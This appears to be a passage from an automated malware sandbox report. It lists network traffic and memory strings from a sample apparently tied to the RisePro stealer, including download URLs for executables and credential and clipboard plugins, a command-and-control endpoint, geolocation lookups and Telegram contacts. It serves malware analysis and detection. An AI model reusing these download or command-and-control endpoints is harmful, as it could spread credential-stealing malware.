Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /lend/alexxxxxxxx.exe HTTP/1.1Host: 193.233.132.167
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: unknown HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/random.exe
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exe
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exe
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exeQ
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe
Source: explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe5e67ee
Source: explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe5e67ee8
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exeo
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exeu
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllB
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllh
Source: explorha.exe, 00000006.00000002.2904871906.0000000000A96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E1743B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.2892509768.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php1Y
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php51001
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176286000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1%r0
Source: rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1;BU)(A;OICI;GXGR;;;WD)AY
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1=1
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176286000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1Trg
Source: rundll32.exe, 00000008.00000002.2450226998.000002E1743E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1a
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1heH
Source: explorha.exe, 00000006.00000002.2904871906.0000000000A96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpF
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpIY
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpUsers
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
Source: rundll32.exe, 0000000D.00000002.2892509768.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpl
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpll32.dll
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpmb3JtLXVybGVuY29kZWQ=
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpoded
Source: rundll32.exe, 00000008.00000002.2450226998.000002E1743B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpq8
Source: powershell.exe, 0000000B.00000002.2432332718.00000246D4E79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C4E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, RageMP131.exe, 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDp
Source: ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C4E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C643E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C631F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C643E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/%
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/?
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/O
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/W
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.603
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.609
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60e
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60l
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60r
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60u
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60z
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/y
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.00000000015C1000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.000000000139C000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.60
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.60j11
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.60z
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: MPGPH131.exe, 00000013.00000002.2899823054.00000000014DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/B
Source: MPGPH131.exe, 00000014.00000002.2899702692.00000000011FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/E
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001401000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D31000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000156D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/s
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000159E000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AA8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001401000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.604
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.607g
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60D
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60G
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60s
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.000000000139C000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.54.60
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.54.60P
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.54.60R
Source: powershell.exe, 0000000B.00000002.2432332718.00000246D4E79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t..
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001378000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT.C
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT7uW
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTW
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTy
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.60$
